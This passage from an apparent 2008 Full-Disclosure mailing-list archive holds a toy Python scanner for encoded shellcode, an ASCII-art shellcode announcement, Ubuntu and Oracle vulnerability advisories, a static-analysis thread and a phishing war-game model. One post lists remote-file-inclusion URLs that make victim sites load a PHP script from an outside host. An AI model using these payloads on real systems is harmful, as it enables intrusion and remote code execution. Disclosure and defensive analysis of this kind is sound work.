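      2. A fragment hit inside a run counts only if the run also has room for
         the encoded bytes that must precede and follow the fragment.
    """
    fragment = known[frag_start:frag_end]
    enc_total = 2 * len(known)
    enc_before = 2 * frag_start
    enc_after = enc_total - enc_before - 2 * len(fragment)
    # One encoded search string per key: this set of 62 needles is what a
    # Wu-Manber style multi-pattern matcher would be fed in a real IDS.
    needles = {key: toy_encode(fragment, key) for key in range(62)}
    hits = []
    for run in ALNUM_RUN.finditer(buf):
        start, end = run.span()
        if end - start < enc_total:
            continue  # rule 1: run too short for the whole payload
        for key, needle in needles.items():
            pos = buf.find(needle, start, end)
            while pos != -1:
                if pos - start >= enc_before and end - (pos + len(needle)) >= enc_after:
                    payload_at = pos - enc_before  # rule 2 passed
                    # Confirm: decode the full window and compare to the signature.
                    if toy_decode(buf[payload_at:payload_at + enc_total], key) == known:
                        hits.append((payload_at, key))
                pos = buf.find(needle, pos + 1, end)
    return sorted(hits)


# Constructed stand-in for a "known shellcode": 32 arbitrary bytes, not real code.
KNOWN = bytes(range(0x10, 0x30))

# Constructed sample traffic: a long benign alphanumeric run (searched, no hit),
# the whole payload under key 17 (hit), and a front-truncated copy under key 5
# padded with zeros (fragment present, rejected by rule 2, never decoded).
SAMPLE = (
    b"user=alice&token=" + b"A" * 70
    + b"&data=" + toy_encode(KNOWN, 17)
    + b"&junk=" + toy_encode(KNOWN, 5)[10:] + b"0" * 20
    + b"\r\n"
)


def demo():
    """Search SAMPLE using bytes 8..16 of KNOWN as the signature fragment."""
    return scan(SAMPLE, KNOWN, 8, 16)


if __name__ == "__main__":
    for offset, key in demo():
        print(f"encoded payload at offset {offset}, key {key}")
```

The 62 per-key needles are exactly the pattern set a Wu-Manber matcher would index, which is where the multi-pattern search the post recommends would replace the `bytes.find` loop; the final decode-and-compare is what turns a fragment hit into a confirmed match rather than a guess.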
** eSafe scanned this email for viruses, vandals and malicious content **
**********************************************************************************************

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: alnum_decoder_encoder.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/19069f91/attachment.c

From berendjanwever at gmail.com Mon Aug 4 12:47:43 2008
From: berendjanwever at gmail.com (Berend-Jan Wever)
Date: Mon, 4 Aug 2008 13:47:43 +0200
Subject: [Full-disclosure] ASCII Art shellcode
Message-ID: <3fa2f5bb0808040447t411cc379pfe35f0cc0f7f8f39@mail.gmail.com>

Hi all,

I've put some more stuff online I created in the last two years; ASCII Art shellcode:
http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Organic
http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Blocky
http://skypher.com/wiki/index.php?title=ASCII_Art/Shellcode/Julia

As the name suggests, it is working shellcode that's also ASCII Art. They all use the same basic principle: a small decoder embedded into the first characters of the ASCII Art. After the decoder, the original shellcode is encoded into the remainder of the ASCII Art. When executed, the decoder decodes the original shellcode and runs it, similar to how my ALPHA2 alphanumeric shellcode works.

If you are going to release an exploit, you might as well make it look good.

Cheers,
SkyLined

--------------------------------------------------------------------------------------------------------
Berend-Jan Wever
http://skypher.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/3e127a9a/attachment.html

From jamie at canonical.com Mon Aug 4 14:46:45 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Mon, 4 Aug 2008 09:46:45 -0400
Subject: [Full-disclosure] [USN-626-2] Devhelp, Epiphany, Midbrowser and Yelp update
Message-ID: <20080804134645.GA13344@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-626-2             August 04, 2008
devhelp, epiphany-browser, midbrowser, yelp update
https://launchpad.net/bugs/253462
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  devhelp                         0.19-1ubuntu1.8.04.3
  epiphany-gecko                  2.22.2-0ubuntu0.8.04.5
  midbrowser                      0.3.0rc1a-1~8.04.2
  yelp                            2.22.1-0ubuntu2.8.04.2

After a standard system upgrade you need to restart Devhelp, Epiphany, Midbrowser and Yelp to effect the necessary changes.

Details follow:

USN-626-1 fixed vulnerabilities in xulrunner-1.9. The changes required that Devhelp, Epiphany, Midbrowser and Yelp also be updated to use the new xulrunner-1.9.

Original advisory details:

 A flaw was discovered in the browser engine. A variable could be made to overflow causing the browser to crash. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2785)

 Billy Rios discovered that Firefox and xulrunner, as used by browsers such as Epiphany, did not properly perform URI splitting with pipe symbols when passed a command-line URI. If Firefox or xulrunner were passed a malicious URL, an attacker may be able to execute local content with chrome privileges.
 (CVE-2008-2933)

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.diff.gz
    Size/MD5: 31298 9c7bb3906f79ab2c1f190cbefb703f82
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.dsc
    Size/MD5: 1114 bb5bf149ce7b8df7a16d7ab7c411d5ed
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19.orig.tar.gz
    Size/MD5: 675357 3a9cb38f83d7f20391b19e305608f289
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.diff.gz
    Size/MD5: 41819 89fa0f8815e04a0f634241b6c1f364d3
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.dsc
    Size/MD5: 1589 61c107f668ad8b4aa25c398b0c93fe1d
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2.orig.tar.gz
    Size/MD5: 7126288 cdc44e20c2ebaba1fe71c1154030dcd9
http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.dsc
    Size/MD5: 1081 fcc8bc8330370aa9df477a6b6f6fb819
http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.tar.gz
    Size/MD5: 46625228 e35bc6b300ba8ba6795cc3c8544c1c70
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.diff.gz
    Size/MD5: 1268814 35076923ad47e759c7944548421dee51
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.dsc
    Size/MD5: 1230 bd4fda6dd2e3c57f2db67e635e805a5b
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1.orig.tar.gz
    Size/MD5: 1528478 e97a18f7e002d293394726004fc110b7

  Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.19-1ubuntu1.8.04.3_all.deb
    Size/MD5: 38486 95c5a3b17fd74b4dd632e7c8a2c559ec
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-data_2.22.2-0ubuntu0.8.04.5_all.deb
    Size/MD5: 3296778 b77676d76c4a5ba0728fca33aadc238a
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_2.22.2-0ubuntu0.8.04.5_all.deb
    Size/MD5: 115802 30f9179b2bbeb7fc0170ec9156deedd5
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5_all.deb
    Size/MD5: 49494 bb116eb3227198464792497dbf1b1fa3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_amd64.deb
    Size/MD5: 17026 5fd05c053b42d0ab1228e97953aa8775
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_amd64.deb
    Size/MD5: 100988 c8f2b1a6898df9a34715ed306ce0f28d
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_amd64.deb
    Size/MD5: 6702 35a0280af7c5ad62333b6ad64c612bd9
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_amd64.deb
    Size/MD5: 1948612 87efe42bb7facafb8f5c24ecb7d256ef
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_amd64.deb
    Size/MD5: 579338 3e65b363fad9bb0f9364d13312d438c1
http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_amd64.deb
    Size/MD5: 1222428 1ec764e382c763932d3485062f9d30a8
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_amd64.deb
    Size/MD5: 359272 22eda6f6103d5b22a7fd6734941ce57a

  i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_i386.deb
    Size/MD5: 31736 3930e413a69542a6fe692da52e122bf6
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_i386.deb
    Size/MD5: 79106 7d4f9e0bca4834ffe03160a25fd5d915
http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_i386.deb
    Size/MD5: 21908 4da4fbb4969b6f50dfdd970e6b330434
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_i386.deb
    Size/MD5: 1863560 670d52c0413ae0f34b7d515e75f35022
http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_i386.deb
    Size/MD5: 545286 900c7fe883d5b0a134e6f562d91dfdff
http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_i386.deb
    Size/MD5: 1192374 75f56b11566863c175d97f2015c8c4e0
http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_i386.deb
    Size/MD5: 346632 08944188ce8e4e48b76f63c6bead71f9

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_lpia.deb
    Size/MD5: 16710 9eca7f0fe03d7555b777e2f3bbd69444
http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_lpia.deb
    Size/MD5: 92962 6ebfa49dcabb3d76a43c929d0ad9b86d
http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_lpia.deb
    Size/MD5: 6708 1e479fcf05f054761cb6c5f645691272
http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_lpia.deb
    Size/MD5: 1881282 9acc6a2939b1a0f25d9957170fb2be0d
http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_lpia.deb
    Size/MD5: 540030 f21b130d59e6765fcf62145741edfb31
http://ports.ubuntu.com/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_lpia.deb
    Size/MD5: 1187040 8b9a8b1a869b4126113c1a42144fa749
http://ports.ubuntu.com/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_lpia.deb
    Size/MD5: 347230 bb2cf6e1ffd5251a3fdc0ca040591720

  powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_powerpc.deb
    Size/MD5: 19474 c8238d336c7d5809ffd284e23e583258
http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_powerpc.deb
    Size/MD5: 101252 71fc2e25b914d62b9dcc84fa34a37bb5
http://ports.ubuntu.com/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_powerpc.deb
    Size/MD5: 6712 f02cac506dc419a8d6bbea10f17f6c31
http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_powerpc.deb
    Size/MD5: 1931954 959869f5deb73dc20ad999df7db6db29
http://ports.ubuntu.com/pool/main/e/epiphany-browser/epiphany-gecko_2.22.2-0ubuntu0.8.04.5_powerpc.deb
    Size/MD5: 576138 a07f45bdb84eda63783fda40635d12a8
http://ports.ubuntu.com/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2_powerpc.deb
    Size/MD5: 1212598 1e1c5ab7e9e4e1ad45763faffc0e2d83
http://ports.ubuntu.com/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2_powerpc.deb
    Size/MD5: 361420 7f1093eb894d3c55c8d15efd793ae451

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/a8d3d72b/attachment.bin

From modversion at gmail.com Mon Aug 4 15:47:38 2008
From: modversion at gmail.com (modversion)
Date: Mon, 4 Aug 2008 22:47:38 +0800
Subject: [Full-disclosure] free static analysis tool for c/c++
Message-ID: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com>

hi list:
I want a free static analysis tool for c/c++ code in win32 platform, which does not need to compile the code.

I tried rats, its4 and flawfinder, but it seems that they can only find the dangerous functions like strcpy.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080804/2aa887bd/attachment.html

From shatter at appsecinc.com Mon Aug 4 17:16:01 2008
From: shatter at appsecinc.com (Team SHATTER)
Date: Mon, 04 Aug 2008 12:16:01 -0400
Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Application Server (WWEXP_API_ENGINE)
Message-ID: <48972B41.9070900@appsecinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Application Server (WWEXP_API_ENGINE)

August 4, 2008

Risk Level:
High

Affected versions:
Oracle Application Server 9.0.4.3, 10.1.2.2 and 10.1.4.1

Remote exploitable:
Yes (No authentication required)

Credits:
This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
Oracle Application Server installs the PL/SQL package WWEXP_API_ENGINE owned by PORTAL in the backend Oracle database server. The 'ACTION' procedure of this package has an instance of SQL Injection that allows attackers to create anonymous PL/SQL programs and execute any kind of PL/SQL statements. The statements are executed with the privileges of the PORTAL user, that has DBA privileges. The vulnerability can be exploited using a web application and without authentication.

Impact:
Exploitation of this vulnerability allows an unauthenticated attacker on the Internet to gain full control of a backend Oracle database server via a vulnerable web site.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.
Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

Timeline:
Vendor Notification - 1/3/2008
Vendor Response - 1/8/2008
Fix - 7/15/2008
Public Disclosure - 7/23/2008

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXK0EACgkQ9EOAcmTuFN0XTACfVffmDNUHutUYu0+5G5zks/tG
m3cAn2pILpcdBbr1Rql7zwerfEjMi9m4
=72Cl
-----END PGP SIGNATURE-----

From shatter at appsecinc.com Mon Aug 4 17:42:30 2008
From: shatter at appsecinc.com (Team SHATTER)
Date: Mon, 04 Aug 2008 12:42:30 -0400
Subject: [Full-disclosure] Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHHOME Parameter)
Message-ID: <48973176.2010505@appsecinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

Cross-site scripting in Oracle Enterprise Manager (REFRESHHOME Parameter)

August 4, 2008

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 10gR1 and Oracle Enterprise Manager Grid Control 10gR1

Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.

The "REFRESHHOME" parameter used in web pages of Oracle Enterprise Manager is vulnerable to cross-site scripting attacks.
User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code.

Impact:
Attackers might steal administrator's session cookies, thereby allowing the attacker to impersonate the valid user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2590

Timeline:
Vendor Notification - 8/24/2007
Vendor Response - 8/29/2007
Fix - 7/15/2008
Public Disclosure - 7/23/2008

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXMXYACgkQ9EOAcmTuFN2wVgCfbH8TPbl61Hm3ZMkqi8PoucEG
buQAniGAyNuPJO5xdaJHRu8JCUX5lJxp
=A8u7
-----END PGP SIGNATURE-----

From shatter at appsecinc.com Mon Aug 4 17:43:27 2008
From: shatter at appsecinc.com (Team SHATTER)
Date: Mon, 04 Aug 2008 12:43:27 -0400
Subject: [Full-disclosure] Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter)
Message-ID: <489731AF.3040605@appsecinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter)

August 4, 2008

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 10gR1, 10gR2 and 11g (11.1.0.6)

Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it.
A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.

The "REFRESHCHOICE" parameter used in web pages of Oracle Enterprise Manager is vulnerable to cross-site scripting attacks. User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code.

Impact:
Attackers might steal administrator's session cookies, thereby allowing the attacker to impersonate the valid user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2603

Timeline:
Vendor Notification - 12/27/2007
Vendor Response - 12/27/2007
Fix - 7/15/2008
Public Disclosure - 7/23/2008

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXMa8ACgkQ9EOAcmTuFN33twCfV6yidpr9eAmIbhvBTyY07uE6
RVIAoLKVCD5lsBM0IyksviVGbrhu1tlF
=CyQi
-----END PGP SIGNATURE-----

From shatter at appsecinc.com Mon Aug 4 17:41:30 2008
From: shatter at appsecinc.com (Team SHATTER)
Date: Mon, 04 Aug 2008 12:41:30 -0400
Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN)
Message-ID: <4897313A.2030607@appsecinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN)

August 4, 2008

Risk Level:
Medium

Affected versions:
Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1

Remote exploitable:
Yes (Authentication to Database Server is needed)

Credits:
This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Restrict access to the SYS.DBMS_DEFER_SYS package.

Fix:
Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink.

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592

Timeline:
Vendor Notification - 9/24/2007
Vendor Response - 9/28/2007
Fix - 7/15/2008
Public Disclosure - 7/23/2008

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK
O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI
=X2Bp
-----END PGP SIGNATURE-----

From piercede at pdx.edu Mon Aug 4 20:16:50 2008
From: piercede at pdx.edu (Dean Pierce)
Date: Mon, 04 Aug 2008 12:16:50 -0700
Subject: [Full-disclosure] free static analysis tool for c/c++
In-Reply-To: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com>
References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com>
Message-ID: <489755A2.5000704@pdx.edu>

Awesome!
I hadn't realized that I could use fd to make requests also.
I would like some quicktime 0day, some bitchin shellcode that makes all the windows melt away revealing the word "PWNT" in big red letters on a black background, and 3 gallons of chocolate milk.

On a side note, lack of proper static analysis tools in the OSS community makes the baby jesus cry.

- DEAN

modversion wrote:
> hi list:
> I want a free static analysis tool for c/c++ code in win32 platform, which
> does not need to compile the code.
>
> I tried rats, its4 and flawfinder, but it seems that they can only find the
> dangerous functions like strcpy.
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From kristo57 at mail.ru Mon Aug 4 21:26:49 2008
From: kristo57 at mail.ru (Kristo pher)
Date: Tue, 05 Aug 2008 00:26:49 +0400
Subject: [Full-disclosure] New info tool available at freewebtown.com/sombra6/info.php now
Message-ID:

http://victim.com/members_awiz/rebuild.php?path_full=http://freewebtown.com/sombra6/info.php?
http://victim.com/amember/plugins/db/mysql/mysql.inc.php?config[root_dir]=http://freewebtown.com/sombra6/info.php?
http://victim.com/poll/admin/common.inc.php?base_path=http://freewebtown.com/sombra6/info.php?
http://victim.com/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://freewebtown.com/sombra6/info.php?
http://victim.com/index.php?file=http://freewebtown.com/sombra6/info.php?
From thouth at gmail.com Tue Aug 5 01:28:02 2008
From: thouth at gmail.com (Fionnbharr)
Date: Tue, 5 Aug 2008 10:28:02 +1000
Subject: [Full-disclosure] free static analysis tool for c/c++
In-Reply-To: <489755A2.5000704@pdx.edu>
References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <489755A2.5000704@pdx.edu>
Message-ID: <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com>

http://www.eresi-project.org/
http://www.phrack.org/issues.html?issue=64&id=8#article

Nice jokes Dean. Preeeetty funny.

2008/8/5 Dean Pierce :
> Awesome!
> I hadn't realized that I could use fd to make requests also.
>
> I would like some quicktime 0day, some bitchin shellcode that makes all
> the windows melt away revealing the word "PWNT" in big red letters on a
> black background, and 3 gallons of chocolate milk.
>
> On a side note, lack of proper static analysis tools in the OSS
> community makes the baby jesus cry.
>
> - DEAN
>
> modversion wrote:
>> hi list:
>> I want a free static analysis tool for c/c++ code in win32 platform, which
>> does not need to compile the code.
>>
>> I tried rats, its4 and flawfinder, but it seems that they can only find the
>> dangerous functions like strcpy.
>>
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From stuart at cyberdelix.net Tue Aug 5 02:03:22 2008
From: stuart at cyberdelix.net (lsi)
Date: Tue, 05 Aug 2008 02:03:22 +0100
Subject: [Full-disclosure] phish war game
Message-ID: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net>

BLUE TEAM: anti-phishing blacklist
RED TEAM: phish
GREEN TEAM: end-users

starting degree of obfuscation: 0% (none)
starting number of blocked domains: 0

----------

round 1:

action: RED sends billions of phish
consequence: 5% of GREEN members are suckered and lose some cash

action: BLUE blocks the top 20 phished domains using the FROM field
consequence: 80% of RED members are forced to make new sites and find new victims

current degree of obfuscation: 0%
current number of blocked domains: 20

round 2:

action: RED obfuscates their FROM fields by 20% and resends billions of phish
consequence: 4% of GREEN members are suckered and lose some cash

action: BLUE blocks the next top 20 phished domains using the FROM field
consequence: 80% of RED members are forced to make new sites and find new victims

current degree of obfuscation: 20%
current number of blocked domains: 40

round 3:

action: RED obfuscates their FROM fields by 20% and resends billions of phish
consequence: 3% of GREEN members are suckered and lose some cash

action: BLUE blocks the next top 20 phished domains using the FROM field
consequence: 80% of RED members are forced to make new sites and find new victims

current degree of obfuscation: 24%
current number of blocked domains: 60

round 4:

action: RED obfuscates their FROM fields by 20% and resends billions of phish
consequence: 2% of GREEN members are suckered and lose some cash

action: BLUE blocks the next top 20 phished domains using the FROM field
consequence: 80% of RED members are forced to make new sites and find new victims

current degree of obfuscation: 28.8%
current number of blocked domains: 80

round 5:
action: RED obfuscates their FROM fields by 20% and resends billions of phish
consequence: 1% of GREEN members are suckered and lose some cash

action: BLUE blocks the next top 20 phished domains using the FROM field
consequence: 80% of RED members are forced to make new sites and find new victims

current degree of obfuscation: 34.56%
current number of blocked domains: 100

round 6:

action: RED obfuscates their FROM fields by 20% and resends billions of phish
consequence: 0% of GREEN members are suckered and lose some cash

----------

GAME OVER: RED loses at round 6, as 0% of GREEN members are suckered, due to over-obfuscation.

final degree of obfuscation: 41.47%
final number of blocked domains: 100

----------

observations:

1. The model is over-simplified, in reality it's unlikely that BLUE would consistently achieve 80%. However in reality it's also unlikely that RED would enjoy a linear relationship between obfuscation and success, specifically, the more RED obfuscates the less success it has. Both teams might suffer diminishing returns from their efforts. (for the purposes of the above model, these effects have been allowed to cancel each other out)

2. The model has a constant 1% reduction in the victim rate, this is debatable, however it will never go upwards, e.g., there is nothing RED can do to push that number back towards 100%. Conversely, everything BLUE does pushes that number towards 0%. In addition, other anti-phishing technologies will also be pushing the number towards 0%. GREEN itself might even push the number down.

3. The model does not allow RED to increase the number of phish they send. In reality, they may well do so. However they will be blocked faster in this case, not only by BLUE but also by other technologies, such as spam filters. (for the purposes of the above model, these effects have been allowed to cancel each other out)

4. The model does not allow the game to be terminated voluntarily.
In reality, RED will terminate the game voluntarily when phish revenue per hour falls below revenues per hour available from other sources. This will be some time before 0% of GREEN members are suckered, perhaps as early as round 3. 5. The blacklist contains 100 items at the time RED loses. It may contain as little as 60 at the time RED terminates voluntarily. ---------- links: (...) http://en.wikipedia.org/wiki/Business_War_Games (this is a sales brochure, however it describes a war game a bit nicer than wiki, it's got diagrams, for a start) http://www.coleago.co.uk/uploads/Training/War%20Gaming.pdf (this isn't relevant to a war game, it might be something like what's happening when the top 20 phished domains are used to select the items to blacklist, OTOH, it might not, I don't know, I'm not a statistician. I'd love to know the name of the technique, I use something similar to optimise my spam rules...) http://en.wikipedia.org/wiki/Monte_Carlo_method (this was mentioned in one of the papers I quoted previously) http://en.wikipedia.org/wiki/Pareto_principle --- Stuart Udall stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ --- * Origin: lsi: revolution through evolution (192:168/0.2) From modversion at gmail.com Tue Aug 5 04:30:19 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 11:30:19 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <489755A2.5000704@pdx.edu> <5ae653bf0808041728n7e5a4128n94e70881b20f2528@mail.gmail.com> Message-ID: 